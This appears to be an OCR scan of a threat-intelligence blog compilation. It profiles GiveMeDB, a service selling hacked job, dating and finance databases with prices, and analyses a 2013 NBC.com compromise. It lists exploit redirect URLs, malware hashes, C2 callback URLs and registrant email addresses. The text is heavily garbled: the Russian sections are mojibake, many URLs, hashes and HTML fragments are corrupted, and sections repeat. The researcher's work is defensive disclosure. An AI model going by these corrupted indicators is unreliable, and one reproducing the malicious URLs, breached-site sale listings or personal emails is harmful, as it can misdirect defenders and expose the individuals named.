www.givemedb.com © Copyright 2009 GiveMeDB Service. All rights reserved 


Primary URL: hxxp://givemedb.com - Email: giverems@mail.ru 
Secondary URL: hxxp://shopdb. blogspot.com 
ICQ: 9348793; 5190451 


During 2009, the domain used to respond to 83.133.123.228 (LAMBDANET-AS European 
Backbone of LambdaNet), it then changed IPs to 74.54.82.209 (THEPLANET-AS - TheP- 
lanet.com Internet Services, Inc.). The following domains used to respond to the same IP 
(83.133.123.228), pornofotki.com.ua, mail.vipnkvd.ru. What are the chances that these 
IPS are known to have been involved in related malicious/cybercrime-friendly activities? 
Appreciate my rhetoric. 


We've got the following [4]MD5: 6a9b128545bd095dbbb697756f5586a9 spamming links 
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to the same (hxxp://83.133.123.228/uksus/?t=3) in particular. Cross-checking the second IP 
(74.54.82.209) across multiple proprietary and public databases, reveals a diversified criminal 
enterprise that’s been using it for years. 


The following MD5s are known to have phoned back to the same IP (74.54.82.209): 
[5]MD5: d48a7ae9934745964951a704bcc70fe9 

[6]MD5: 4626de911152ae7618c9936d8d258577 

[7]JMD5: ca4b79a33ea6e31leafa59a6c3fffee2 

[8]MD5: eb3b44cee34ec09ec6c5917c5bd7cfb4 


As well as a recent (2011) [9]Palevo C &C activity. Clearly, they’ve been multi-tasking 
on multiple fronts. 


The structure of propositions is the following: partial URL of the hacked Web site, coun- 


try of the Web site, Quantity of records per database, First-time price, Exclusive price. The list 
of affected Web sites is as follows: 


| fnasnaa | Mpsitc | Npasuna | O Hac | Kowraxre: | 


Npaic 


Hike npeactasnex Haw npaiic, 8 Hero BKNHOYeHbI MMeloWMeCcA B Hannunn Gabi AaHHEIX 
Cc yka3aHHbIx pecypcos. Hanpotue Kaxgoro Topapa obo3HaYeHO KONMYeCTBO 3anncell B Iipaiic: 
6ase W ABe YeHbI, NepBaA - NOHWOKEHHAA, paCcCuMTaHHaA Ha NpOAaxy Gaabi Tpem nepBbiM 


NokynaTenamM, BTOpAaA - NONHAA WeHAa, PACCUMTAHHAA Ha SKCKNWOSHBHYW Nposaxy Bbasb! © Job Bases 
Tonbko Bam © Osting Geses 
= @ Finance Bases 
@ Other Bases 


B yenax 6esonacHoc™, MbI He ykKa3bIBaeM AOMEHHYHO 30HY B CCbINKaX Ha 
NpeACTaBNeHHble pecypcbi, BCH AONONHMTeNbHYW MHopmMauMio Bel MoxeTe nonyunT y 


HawwMx support’os. KoutTaktTbi: 
Buumauue! Bce 6a3bi npogatorca orpaxMyeHHoe YMCNO pa3 M yAanatorca nocne ux 

npvobperexna!l [S ICQ: 9248793 - Ru 
Bxumauue! Mei He 3aHumMaeMcA CNaMoM M He Mcnonb3yem 6a3b! HM KaKMM HHbIM f= 

cnoco6om! ICQ: 5190451 - En 


Paagen - Job Bases (jobseekers): 


KonnuyectTBo 
5o LleHa* (|LleHa* 


jobsbazaar.* IN [10 000 20$ (60$ 
availablejobs.* lus [380 000 300$ [900$ 
ecarers.* |UK 6 000 20$ (60$ 
fecareers.* [UK 160 000 150$ 450$ 
healthmeet.* lus 260 000 200$ (600$ 
youths.* CH 16 000 30$ (90$ 
jobpilot.* IDE [38 000 50$ 150$ 


ed ee Ss 
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Job/CV Databases: 
jobsbazaar.* 
availablejobs.* 
ecarers.* 
fecareers.* 
healthmeet.* 
youths.* 

jobpilot.* 
thecareerengineer.* 
iauk.* 

jobboerse.* 
creativepool.* 
jobsinkent.* 
jobsinthemoney.* 
jobup.* 
rxcareercenter.* 
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iauk.* 


creativepool.* 
jobsinkent.* 


jobup.* 


careerweb.* 
rxcareercenter.* 


?a3gen - Dating: 


Pecype 


muenchner- 


singles .* 
dateclub.* 


find-you.* 


datingz.* 


Dating Databases: 
freedating.* 
singles-bar.* 
muenchner-singles.* 
dateclub.* 
websingles.* 
find-you.* 
fitness-singles.* 
houstonconnect.* 
datingz.* 
loveandfriends.* 
lovebyrd.* 
mydatingplacephx.* 
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jobboerse.* 


jobsinthemoney .* 


freedating.* 
singles-bar.* 


websingles.* 


fitness-singles .* 
houstonconnect.* 


loveandfriends.* 


thecareerengineer.* [UK 4 30 000 [100$ [300$ 


[UK [43 000 [50$ [150$ 
[DE l22 000 40$ [120$ 
[UK l26 000 [40$ [120$ 


KonuyecTBo 
a O6waa |SKcKnlo3sMBHaA 
CTpana |sanucen B ee = 
Bo LleHa* (Llena 


lUk [120000 |120$_[s608 
lus [130000 [1308908 


be bs 000 os 1208 
[UK [so 000 (s0$ [240$ 
[AT [200 000 [200$ [600$ 
[DE l9 000 l20$ le0$ 
lus lo4 000 l90$ [270$ 2 
[UK [40 000 [40$ [120$ 
lus [12 000 [20$ le0$ 
lUK [50 000 [50$ (1 50$ 


cozydating.* 


singletreffen.* 


datearea.* 


endless-fantasy.* 


llovebyrd.* US  |12 000 20$ + ~—- |60$ 
mydatingplacephx.* lus [45 000 [30$ l90¢ 
cozydating.* lus is 000 20$ 60$ 
singletreffen.* [DE [230 000 [200$ (600$ 
datearea.* IDE 4 3 000 [30$ lo0$ 
endless-fantasy.* [DE iss 000 l90$ [270$ 


Pasgen - Finance: 


> c Roeeecins O6waa |SKcKnHlo3uBHaA 
ecype TpaHa meee B Llena* |Llena* 


importers.* [US/EU 200 000 [200$ |600$ 
money.* lus [480 000 [400$ [1200$ 
pcquote.* [US/CA 1 30 000 1 30$ [390$ 
investorvillage.* lus [40 000 (50$ (1 50$ 
(gurufocus.* lus [30 000 (50$ [1 50$ 
individual.* lus [100 000 100$ [300$ 
arabianbusiness.* [Asia [34 000 (50$ 1 50$ 
ecademy.* [US/EU 208 000 [200$ (600$ 


Pasgen - Other: 


widest O6waa SKckniosuBHaAn 
Pecypc CtTpana oa B Lena* |Llena* 


pokersourceonline.* [US/EU [100 000 [100$ [300$ 
lwickedcolars * luK [120 000 lans [240% 


Financial Databases: 


importers. * 
money.* 
pcquote.* 


investorvillage.* 


gurufocus.* 
individual.* 


arabianbusiness.* 
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ecademy.* 


KOnM4eCTBO | 6 was |SKcknosMBHan 
Pecypc TpaHa sanucen B x 
Bp LleHa 


pokersourceonline.* [US/EU 100 000 '100$ [300$ 
lwickedcolors.* [UK 120 000 (80$ [240$ 
salespider.* [US/CA 150 000 '100$ [300$ 
busytrade.* [CN 175 000 (100$ [300$ 
lfunky.* [UK 80 000 '50$ [150$ 


“OOwian LleHa - noHWKeHHAaA WeHa, PAaCCUMTAHHaA Ha Nposaxy Oa3bi TOeM NepBbiM 
nokynatenam. 


*“OxcKnto3MBHaa LleHa - NONHaA CTOMMOCTb, paCCUNTaHHaA Ha SKCKNHO3MBHYHO Npogaxy 
6a3u: Tonbko Bam. 


*CTpava He ABNAeTCA TOUH‘IM aHanOromM AOMeHHO! 3OHbI pecypca. B yenax 
6esonacHocTu, MbI He yKa3biIBaeM AOMeHHYIO 30H B CCbINKAaX Ha NpeACTaBNeHHEle 


pecypcel. 


09 GiveMeDB Service. All rights reserved 


weww.givemedb.com 


Other Databases: 
pokersourceonline.* 
wickedcolors.* 
salespider.* 
busytrade.* 

funky.* 


Purchasing these hacked databases, immediately improves the competitiveness of a po- 
tential cybercriminal, who now has everything he/she needs to launch spam, spear phishing, 
and [10]money mule recruitment campaigns, at their disposal. 


For years, novice cybercriminals or unethical competitors have been on purposely join- 
ing closed cybercrime-friendly communities, seeking help in exchange for a financial incentive, 
in obtaining access to a particular database, or for the "[11]defacement" of a specific Web site. 
What this service proves is that, the model can actually scale to disturbing proportions, offer- 
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ing access to millions of compromised database records to virtually anyone who pays for them. 


This post has been reproduced from [12]Dancho Danchev’s blog. Follow him 
[13]Jon Twitter. 


1. http://www.nytimes.com/2013/01/31/technology/chinese-hackers-infiltrate-new-york-times-computers.html?pag 
2. http: //professional. wsj .com/article/SB10001424127887323926104578276202952260718 . htm] 

3. http://www.washingtonpost .com/business/technology/chinese-hackers-suspected-in-attack-on-the-posts- comput 
4, htps://uww. virustoval..con/file/ 19121867007 11490baf2664dSbeccSbBaddc75Sb09c3858e04d41904987F6a/analysis/ 
5, netps:/ /wiv. virustotal.con/t1e/20a54d1a26461.05£86187a0c255574d51477aS2a6l8ectbaS0ce7345586c9/ analysis / 
6. https:/ /www. virustotal. con/file/£06967926bci 464441 908acdb7 fdas 1b00f9babacaSUbb7 2811 1945£590db/analysis/ 
7 
8 
9 


~ 


~ 


| hvtps://aww. virustotal .con/file/62636c696cSbff 1SbaGalb58774485ca4f 18c704af941049504b7426f 0437901 /analysis/ 
_ tps: / /wvw, varustoval. con/ile/99d2cbde07817a65472e7545e6e03d0£20£24731£0911£4a84cdcO5£64dea907/analysis/ 
_htps://palevotracker. abuse.ch/?ipaddress-74.54.62.209 

10. https://www.google.com/webhp?hl=enkt ab=wwxauthuser=0#h1=en&tbo=d&authuser=0&sclient=psy-ab&q=site:ddanc 
11. heep://ddanchev. blogspot .con/2008/04/conmercial-veb-site-defacenent-tool. htall 

12, http://adanchev. blogepot.con/ 

13. beep: //ewitver.con/danchodanchev 


~ 


9.2.4 Historical OSINT - Hacked Databases Offered for Sale (2013-02-06 02:03) 


In the wake of the recently announced security breaches at the [1]NYTimes, [2]WSJ, and the 
[3]Washington Post, | decided to shed more light on what happens once a database gets 
compromised by Russian cybercriminals, compared to (Supposedly) Chinese spies, with the 
idea to provide factual evidence that these breaches are just the tip of the iceberg. 


In this intelligence brief, I'll profile a service that was originally operating throughout the 
entire 2009, selling access to compromised databases of multiple high-trafficked Web sites, 
through the direct compromise of their databases, hence, the name of the service - GiveMeDB. 
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| Tnasxaa | Npsitc | Npseuns | O Hac | KoxTaxre: | 


GiveMeDB Service 


Mbi npegctasnaem Bam cepsuc no npogaxe 6a3 AaHHbIx CO 

B3NOMAHHBIX peCypCoB pasnuyHoi TemaTMKH. Y Hac Bol Bcerga moxeTe IIpaiic: 
Npvobpectu Heobxogumblii MaTepvan nog Bawm yenu. Mei npegnaraem 

WWMpOKMM ACCOPTMMeHT, CpeAM KOTOporo npucyTcTBytoT Job/Dating @ Job Bases 


z ® Dsting Bases 
/Finance u apyrne Saab. @ Finance Bases 


: @ Other Bases 
Buumaxue! Mbi He reHepum u He Cobmpaem Gaabi c Beb’a, B HaWweM 


Npaiice npucyTcTByHT TonbKo B3nomaHHble Gasbi. B cnyyae Kakux-nubo 
COMHEHMii MbI BCerga FOTOBbI AOKa3aTb NPMHAANexKHOCTb Hab K TOMY KontTakKTbi: 


un uHOMy pecypcy. 


—— [Z| ICQ: 9348793 - Ru 


—Bxumanue! Matepuanbi caiita He MpoTMBOpeYaT 3aKOHOAAaTeNbcTBy f& 
Poccuu, ctpak CHI, Esponsi u CLUA. Mei He pacnpoctpaHrem ICQ: 5190451 - En 


OXpaHAeMy!O 3aKOHOM MHopmaliMi, a NMLWb NpeAocteperaem 
Bnagenbues CaiiTOB O BO3MO>%KHbIM Npobnemax B chepe 
MHopMauMOHHOM GesonacHocTu. 


Agmuxuctpauma GiveMeDB.com 


® Copyright 2009 GiveMeDB Service. All rights reserved 


Primary URL: hxxp://givemedb.com - Email: giverems@mail.ru 
Secondary URL: hxxp://shopdb.blogspot.com 


ICQ: 9348793; 5190451 


During 2009, the domain used to respond to 83.133.123.228 (LAMBDANET-AS European 
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Backbone of LambdaNet), it then changed IPs to 74,.54.82.209 (THEPLANET-AS - TheP- 
lanet.com Internet Services, Inc.). The following domains used to respond to the same IP 
(83.133.123.228), pornofotki.com.ua, mail.vipnkvd.ru. What are the chances that these 
IPS are known to have been involved in related malicious/cybercrime-friendly activities? 
Appreciate my rhetoric. 


We've got the following [4]MD5: 6a9b128545bd095dbbb697756f5586a9 spamming links 
to the same (hxxp://83.133.123.228/uksus/?t=3) in particular. Cross-checking the second IP 
(74.54.82.209) across multiple proprietary and public databases, reveals a diversified criminal 
enterprise that’s been using it for years. 


The following MD5s are known to have phoned back to the same IP (74.54.82.209): 
[5]MD5: d48a7ae9934745964951a704bcc70fe9 

[6]MD5: 4626de911152ae7618c9936d8d258577 

[7]JMD5: ca4b79a33ea6e3 1leafa59a6c3fffee2 


[8]MD5: eb3b44cee34ec09ec6c5917c5bd7cfb4 


As well as a recent (2011) [9]Palevo C &C activity. Clearly, they’ve been multi-tasking 
on multiple fronts. 


The structure of propositions is the following: partial URL of the hacked Web site, coun- 
try of the Web site, Quantity of records per database, First-time price, Exclusive price. The list 
of affected Web sites is as follows: 
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| fnaexaa | Npaiic | Npasuna | O Hac | Korraxre: | 


Npaiic 


Hipxe npeactasnex Hal Npaiic, B Hero BKNIOYeHE! MMerOUWeCA B HanMunM Oa3bi QaHHbIX 
C yKa3aHHbix pecypcos. Hanpots kaxgoro topapa obosHayeHoO KONMYeCTBO sanuceli B IIpaiic: 
6ase 4 Abe UeHbI, NepBaA - NOHMKEHHAA, paCCuMTaHHaA Ha NpoAaxy Oasbi Tpem NepBbim 


nokynarenaMm, BTOpaA - NONHAA WeHA, PACCUHTaHHaA Ha SKCKNIOSMBHYWO Nposaxy Gaze! © Job Bases 
TonbKo Bam. 4 ae "9 “aaa 
@ Other Bases 


B uenax 6be30nacHoc™, Mbi He yKa3bIBaeM AOMEHHYH 3OHY B CCbINKaX Ha 
NpeActasneuHHble pecypcbi, BCH AONONHMTeNbHYyW MHopmauuto Bet moxkeTe nonyunte y 


HalwMx Support’oB. KoutTaktTbl: 
Buumanve! Bce 6a3b! npogawrca orpaxMyeHHoe YMCNO pa3 M yZanatorTca nocne ux 
npuobperexna! iS ICQ: 9248793 - Ru 


Buumanue! Mei He 3ahMMaemcA CnaMoM M He Mcnonb3yem Gabi HM KaKMM MHbIM ic 
cnocobom! ICQ: 5190451 - En 


Paagen - Job Bases (jobseekers): 


jobsbazaar.* (IN [10 000 [20$ (60$ 
lavailablejobs.* lus [380 000 [300$ [900$ 
jecarers.* [UK 6 000 [20$ (60$ 
lfecareers.* [UK [160 000 [150$ '450$ 
healthmeet.* lus [260 000 [200$ (600$ 
lyouths.* (CH [16 000 [30$ (90$ 
jjobpilot.* IDE [38 000 [50$ /150$ 


——. 


Job/CV Databases: 


jobsbazaar.* 
availablejobs.* 
ecarers.* 
fecareers.* 
healthmeet.* 
youths.* 
jobpilot.* 
thecareerengineer.* 
iauk.* 
jobboerse.* 
creativepool.* 
jobsinkent.* 
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jobsinthemoney.* 


jobup.* 


rxcareercenter.* 


iauk.* 


creativepool.* 


jobup.* 
careerweb.* 


?aaqen - Dating: 


Pecypc 


muenchner- 


singles .* 
dateclub.* 


find-you.* 


datingz.* 


Dating Databases: 


freedating.* 
singles-bar.* 


muenchner-singles.* 


jobboerse* = 
jobsinkent* = 


jjobsinthemoney.* 


rxcareercenter.* 


freedating* 
singles-bar.* 


websingles.* 


houstonconnect.* 


lloveandfriends.* 


ithecareerengineer.* lUK [130 000 1 00$ [300$ 


lus [16000 [30 [oo | 


luk [120000 [120s fse0s_ 
lus [130000 [1308 p90 


be 23 000 os 120$ 


UK [e0000 eos. fa40s 
AT [200000 (200-600 
[DE 9000 aos eos 


lus 04000  o0$ [270  ‘(|- 


luk [40000 (40s (120g. 
lus [12000 aos fous 
luk (50000 (s08 1508 
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dateclub.* 
websingles.* 
find-you.* 


fitness-singles.* 
houstonconnect.* 


datingz.* 


loveandfriends.* 


lovebyrd.* 


mydatingplacephx.* 


cozydating.* 


singletreffen. 


datearea.* 


* 


endless-fantasy.* 
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llovebyrd.* US |12 000 20$ ~—- |60$ 
Imydatingplacephx.* lus 4 5 000 [30$ l90¢ 
cozydating.* lus is 000 20$ |60$ 
singletreffen.* IDE [230 000 [200$ j600$ 
datearea.* [DE [13 000 [30$ lo0$ 
endless-fantasy.* [DE iss 000 lo0$ [270$ 


Pasgen - Finance: 


importers .* lU US/EU = [200$ 600g ttt 
money.* lus [480 [400$ [1200$ 

pcquote.* [US/CA ae 000 [130$ sae 
investorvillage.* lus [40 000 (50$ (1 50$ 
gurufocus.* lus [30 000 (50$ [150$ 
individual.* lus [100 000 1 00$ [300$ 
arabianbusiness.* [Asia [34 000 (50$ [150$ 
ecademy.* [US/EU 208 000 [200$ (600$ 


Pasgen - Other: 


wide sist O6waa |SKcknto3suBHaAv 
Pecypc CTpana a B Uena* |Llena* 


pokersourceonline.* [US/EU [100 000 [100$ [300$ 
wickedecolors * luK [120 000 Es [240% 


Financial Databases: 


importers. * 
money.* 
pcquote.* 
investorvillage.* 
gurufocus.* 
individual.* 
arabianbusiness.* 
ecademy.* 


KonuyectTBo 
Pecypc Pa PRESS — on 
F BO — Llena* (Llena 


lpokersourceonline.* [US/EU 100 000 100$ [300$ 
lwickedcolors.* [UK 120 000 (80$ [240$ 
[salespider.* [US/CA [150 000 (100$ [300$ 
lbusytrade.* [CN [175 000 (100$ [300$ 
lfunky.* [UK 80 000 '50$ [150$ 


"O6uyjaa Lleva - noHWKeHHAA WeHa, PaCCUMTaHHaA Ha Npogaxy Oa3b! Tpem NepsLiM 
nokynatenam. 


*“OxckntosweHan Lleva - NONHAA CTOMMOCTb, PaCCUMTaHHaA Ha SKCKNWO3MBHYHO Npofaxy 
6a3b! TonbKo Bam. 


*CTpava He ABNACTCA TOUHLIM aHanOrOM AOMeHHO! 30HbI pecypca. B yenax 
GeszonacHoctn, MbI He yKa3bIBaeM AOMeHHYHO 3OHY B CCLINKaX Ha NpeACTaBneHHEle 


pecypcel. 
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Other Databases: 


pokersourceonline.* 
wickedcolors.* 
salespider.* 
busytrade.* 

funky.* 


Purchasing these hacked databases, immediately improves the competitiveness of a po- 
tential cybercriminal, who now has everything he/she needs to launch spam, spear phishing, 
and [10]money mule recruitment campaigns, at their disposal. 


For years, novice cybercriminals or unethical competitors have been on purposely join- 
ing closed cybercrime-friendly communities, seeking help in exchange for a financial incentive, 
in obtaining access to a particular database, or for the "[11]defacement" of a specific Web 
site. What this service proves is that, the model can actually scale to disturbing proportions, 
offering access to millions of compromised database records to virtually anyone who pays for 
them. 


Updates will be posted as soon as new developments take place. 


1. http://www.nytimes.com/2013/01/31/technology/chinese-hackers-infiltrate-new-york-times- computers. html?pag 
2. http: //professional .wsj . com/article/SB10001424127887323926104578276202952260718 htm] 

3. http: //www.washingtonpost.com/business/technology/chinese-hackers-suspected-in-attack-on-the-posts-comput 
4. https://wuw.virustotal .com/file/131f2f887007 1f490baf 268fd3becc02b8a4dc755b23¢3853e04d413a4987 6a/analysis/ 
5, netps://vwv.virustotal.con/t1e/20a54d1a2646 e95c86187a0c2#6574d51477aS2a6182ecbbaS0ce7245506c0/analysis/ 
6, https: //wny. virustotal. con/ile/£06867926bcf£4641d1908acdb7£daf h90fYbabaca8Ubb7 2661 1f1945£900db/analyysis/ 
7 
8 
9 


SILTY 


. https://www.virustotal.com/file/62e36c696c8bff 15ba6a1b58774485ca4f 18c704af9410495b4b7d24f e437901/analysis/ 
. https: //www.virustotal.com/file/99d2cbdee78f7d66d7 3e7545e6e03d0f 20f 2d731£9911fdd84c4c95f6ddea9b7/analysis 
. https: //palevotracker.abuse.ch/?ipaddress=74.54.82.209 


ttps://www.google.com/webhp?hl=en&tab=wwkxauthuser=0#h1=en&tbo=d&zauthuser=0&sclient=psy-ab&q=site :ddanc 


~ 


ev .blogspot.com+/22moneytmule/,22%0q=site : ddanchev.blogsp 


11. http: //ddanchev.blogspot.com/2008/04/commercial-web-site-defacement-tool.htm 


9.2.5 Dissecting NBC’s Exploits and Malware Serving Web Site Compromise 
(2013-02-21 22:03) 


The web site of the [1]National Broadcasting Company (NBC), NBC.com, is currently compro- 
mised, and is redirecting tens of thousands of legitimate users to multiple exploits serving 
and malware dropping malicious URLs. The campaign appears to have been launched by the 
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same gang of cybercriminals that’s also been recently involved in impersonating [2]Facebook 
Inc. and [3]Verizon Wireless, in an attempt to trick their users/customers into clicking on 
links found in hundreds of thousands of spamvertised emails pretending to come from the 
companies. 


Let’s dissect the campaign, expose its structure, the dropped malware, and connect the 
dots on who's behind it. 


+ hittp://priceworldpublishing.com/aynk html 
» http://oimg.nbcuni.com/b/ss/nbeuglobal abcunetworkbu/1/H.24/517651 13974701 7AQB= 1&ndh = 1&t=21962F 1% 2F2013%208%SASBW3IASS%204%M20480Rce=UTF-BANS =! 

2=Online&c3 =HomeRc4 = NBC, com 20Front% 20D00r&c6 = http%e3 A %2F 96 2Fwww.nbe, come 2FRCB = TV 20EMtertainment&c9= NBC % 20Networkkcl O=Front%20D00r&c1 t =F 
C40 = Undefinedaw43 = hittp93A%2F%2Fwww.nbc.com%2FRV45 = NBC 20Networkav49 = Online&h 1 = TY%20Entertainment% 7ONBC% 20Network% 7 CFront%20D00r&h2 = Onlin 
hp=NBRAQE=1 

+ http://oimg.nbouni.com/b/ss/nbouglobal nbounetworkbu/ 1/H.24/s17651139747017AQ8= 1&pecr =truekividn = 2893234885 1D161F-400001 2DC00F9F7 1&8undh = 1L&t= 21% 2F 
6 2Fwww.nbc.com%2F&cc= USD&ch = websiserver = wwrw.nbc.com&events = event6&c2 = Onlinekic3 = Homekc4 = NBC com 20Front% 20D00r&c6 = http% 3A % 2% 2Fwww_NbC.com 
C12=NBC%20Network%20% 7C% 20Frant% 20D00r&c1 3 « New&v32 «Homeky36 = Front%20D00rkc40 = Undefined&kv4 3 « http 96 3.4% 2P 9 2Fwww_ nbc, coms 2Fav4 5« NBCIS20Net 
h2=Online%7CFront% 20000196 7CHome% 7CNBC.com %620Front% 20D00r&h3 = www NDC.COMmmS = 1024x768Rc= 248) = 1.78&v=Yak= Y&bw= 1256&bh=4295hhp=NRAQE = 1 


« http://www. nbcudigitaladops.com/hosted/global.js 
+ hittp://wwww_nboudigitaladops.com/hosted/}s/nbc_com.js 
+ http://odn krxd.net/controttag?confid=Hhr_tggh 
+ hittp://apiservices.krxd.net/user_data/segments/3?pubid= $4983(83-88 10-4aGb- Off 1-8 1f73490e967&technographics = 1 &callback = Krux.ns._default.kxjsonp_userData 
+ hitp://secure.quantserve.com/quant.js 
+ http;//pheel.quantserve.com/pixel;r« 386182341 ;aep-9e)8k41Szux46;fpan « 1;fpaePO-1743895828-1361462964538;nse0;ce« 1;je~ 1;sr* 1024x768x24;ences;dst~ jet 136) 
J;0g) «title. TV% 20Network%20for% 20Primetime%252C%20Daytime% 20and% 201 ate% ZONIght%20T eleviston%20Shows % 20% JONBC% 200ffidal % 2Cdescription .Offidal%20 
J vavrO252Enbo%252Ecom/%2Gmage http%3A//www%%25ZENbce% 25 ZEcom/assets/core/themes/201 2/nbc/images/logos/logo-share%252Epag%2Csite_name.NBC%252Ecom 
+ http://b.scorecardresearch .com/beacon js7cl = 2&2 = 100000483 = Act = &c5 = 8b = Ac S= 


+ hitp://secure-us.imnworidwide.com/egi-bin/m?d =us-S0354 lh&eg=O&cc= 1 Asi = http963A//www.nbc,com/8ap=&ts =compacdaund= 1361462965167 
+ hitp://secure-us,lmeworldwide.com/cgi-bin/m 17d «us-S0354 lh&cg= Okc 1&sl http 963 A//www.nbc.com/Sap= &ts = compaxt&rnd= 1361462965167&ja~ 1 
« hitp;//umaiskhan,com/ztuj. him 


Observed iFrames in rotation: 
hxxp://umaiskhan.com/znzd.html 
hxxp://umaiskhan.com/ztuj.html 
hxxp://priceworldpublishing.com/aynk.html 
hxxp://toplineops.com/mtnk.html 
hxxp://moi-npovye-sploett.com/qqqq/1.php 
hxxp://www.jaylenosgarage.com/trucks/PHP/google.php 
hxxp://nikweinstein.com/cl/google.php 


Observed redirections leading to: 
hxxp://gonullersultani.net/znzd.htm 
hxxp://erabisnis.net/znzd.htm 
hxxp://electricianfortwayne.info/62.html 
hxxp://moi-npovye-sploett.com/cGeQcOwz1kPli/larktion. php 
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</nave 
<section classe"spotLight*> 
<div ¢lasse"content "> 


<6iv clats~"aligs center” stylee"heiget:0; overflow: hidden: “> 
<div class=<"advertisement ad726 > 
<KCrIpt typee"text/)avescrapt 


~document .write(usescape (bc Ad728x90. rep lace "728x590. 970n4 703th rep lace("728x07 97006" ))) 1</ecrapt> 


<bender <latee"site™> 
<div ¢lasse"slider-container*> 


wv wed. NC. COM / Communi ty titlee"Comunity’><img srce"/app2/ing/default/scet/metaverse/1/2/1/8/7/6/com_top_helfer.jpg” alte"Tricia Helfer Guest Stars </a> 
<div classe"slide-lege”> 
<2 hrefe"htte abc .com/commusity/" titles"Community"=<ieg srce"http: //wmw. nbc .com/app2/ieg/Gelaslt/scot/metaverse/1/0/6/3/ 1/4/2012 _ 0610 Betton Community Logo CA.pag™ a 


</div> 
<Giv classe"slide-isfo"> 
<hS classe"tune 
«hd clate- 
> class=" 
<div classe*l 

<a brefe"https//waw. nec .com/communaty/video/?apletrue” clas Link -carcle-arrow*><span class-"icens-arrow-Dlue-ca ri</spat> Watch Onlisex</a> 
<a hrefe"http: //waw.nec .com/commens ty/video/seuten-4-prensere-jsm-rash/ndiSG0/" classe"Link-circle-arrow”><span claste*icons-arrow-bloe-circle*>érarri</ipan> Cast feter 


ars</h> 
joins Abed on a trip to the Inspector Spacetime convention. Matt Lucas alse guest stars.</p> 


</dive 
</die 
<div ¢leste"slide"> 
<2 hrefe"http: //wae.b¢ .com/parks-asd-recreation/” title="Parks and Recreation” =<ieg srce"/app2/ieg/default/scot/metaverse/1/2/1/8/7/0/par_top_ wedding O1. jpg” alte"Special One 


Sample client-side exploitation chain for the first campaign: hxxp://toplineops.com/mtnk. html 
-> hxxp://electricianfortwayne.info/62.html -> hxxp://electricianfortwayne. info/987.pdf 


Upon successful client-side exploitation, the campaign drops [4]MD5: 
4e48ddc2a2481f9ff27113e6395160el - detected by 7 out of 46 antivirus scanners as 
Trojan-Spy.Win32.Zbot.jfgj. 


</ul> 
Sar 
</div> 
4 


</nae 
<section classe"spot Light"> 
<div ¢latte"content”> 


<Giv class-“align-center* stylee"heignt:0: everflow:hidéen:*> 
<div class-"advertisement ad728 > 
<S¢ript type="text/javencrip 


>document .write(wmescape (nbc ad? 20x90. rep lace( "728x900. 970006 970x606"). replece( "728x900". "970n06")) ) 1 </script> 


«beater Clatte"site™> 
<div Classe"slider-container*> 


<i-- Begins slidethow 
<div <laste"slider"> 
<div classq"slides"> 
titlee"Community"><img sree” /app2/img/Gefault/scet/metaverse/1/2/1/8/7/6/com_top_helfer. jpg” alte"Tracia Helfer Guest Stars” /></a> 


Title="Commusity“m<ieg srce"Bttp: //war.ndc .com/app2/img/default/scet /metaverse/1/0/6/3/1/4/2032_06)0_ Corton Commenity Logo CA.pag* a 


sesh 


ms Abed on a trip to t tor Spacetime convention. Matt Lucas also quest stars.</p> 


ideo/Tapletree™ ¢ rcle-arrew’><spae classe" icons -arrew-blue-circle’>hrarri</spanm> Watch Online</a> 
Sty/video/seaten-<-preniere-j ie-ragh/ndiSe last="Link-circle-arrow><tpan Classe" icons-arrow-bloe-circle*sirarr:</span> Cast Iater 


<2 hretehttp: / fue 
<iv classe"slide-logo"> 
<2 hrefe"htto1//wew. nbc .com/oarks -and- recreations” title="Parks and Recreation”><ima srce"htto1//wmw. nbc .com/ano2/ima/default/scet/metaverse/1/2/1/4/0/2/2012 0816 NBCU Lose 


ebc .com/parks-asd-recreation/* titles"Parks and Recreation <ing srce*/app2/ing/default/scet/metaverse/1/2/1/8/7/O/par_tep_weddieg Ol. jpg” alte“Spectal One-i 


Once executed the sample creates the "Xi3FVnelx" Mutex and phones back to: 
hxxp.://eastsidetennisassociation.com/i.htm?jzd63F1lJyFUfMyyf1Q8U9 - 74.220.215.229 
hxxp://envirsoft.com/n.htm?xWasESNrgozQ13QNR1IPNCGTGhPAW16Q/67Bnj - 174.120.29.2 - 
Email: louis.bouchard@envirsoft.com 
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hxxp://beautiesofcanada.com/s.htm?2dalYtfCwTLfFBzZTL8TrY7btwJDVszOl - 66.96.145.104 - 
Email: eddom@yahoo.com 
hxxp://magasin-shop.com/v.htm?ZPIlkcqLyyHFRxHMhVxQN8HdfszymBrXxuy - 66.96.160.143 
hxxp://couche-transport.comlu.com/r.htm?Mb6kKF3mMq5H8YxeVXYM9yOwK  £- 31.170.161.96 


Second redirection redirection chain for a sampled iFrame: hxxp://moi-npovye- 
sploett.com/qqqq/1.php -> hxxp://moi-npovye-sploett.com/cGeQcOwz1kKPli/larktion.php -> 
hxxp://moi-npovye-sploett.com/cGeQcOwz1kPl/aflybing.php?esusvity=78528 O where it at- 
tempts to exploit [5]CVE-2010-0188. 


Malicious domains reconnaissance: 

umaiskhan.com - 173.254.28.49 - Email: chfaisalO09@gmail.com - appears to be a compro- 
mised site belonging to someone named "Azhar Mahmood", unless of course you want to 
believe that Pakistan’s cyber warfare unit is behind the campaign, since this is the second 
time that | come across to this IP. Keep reading! 

priceworldpublishing.com - 174.122.45.74 - Email: info@sportsworkout.com 
electricianfortwayne.info - 173.201.92.1 - Email: mdkline65@yahoo.com 

gonullersultani.net - 72.167.2.128 - Email: gonullersultani@gmail.com 

erabisnis.net - 74.220.207.161 

moi-npovye-sploett.com - 130.185.157.102 - Email: josephhaddad829@yahoo.com 
jaylenosgarage.com - 80.239.148.217 

nikweinstein.com - 205.178.145.95 - Email: nikweinstein@hotmail.com 


mdkline65@yahoo.com is also known to have registered the following domains: 
dedirt.com 

dogsrit.com 

spiritualspice.us 
madamerufus.com 
herbalstatelegal.com 
myauditionsite.com 
injurylawyercleveland.info 
injurylawyerspringfieldmo. info 
injurylawyercolumbus.info 
injurylawyerindianapolis.info 
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<div dass ="align-center™ style ="height:0; overflowchidden;"> 
<div dass ="advertisement ad728x90"> 
<script type ="textfavascint” >document. write (unescane(nb<Ad728x90.replace("728x90,970x66", "970x66") replace("728x90", "970x66"))); </scnpt> 
</div> 


* width= 1 


<header dass+"site"> 
<div dass ="sider container" > 


<a href= "http: //www.nbc.com/community/” ttle ="Community”><img sc ="/app2/ma/default/scet/metaverse/1/2/1/8/7/6/com_top_helfer.jng” alt="Trida Helfer Guest Stars 
<div dass="sidetogo"> 

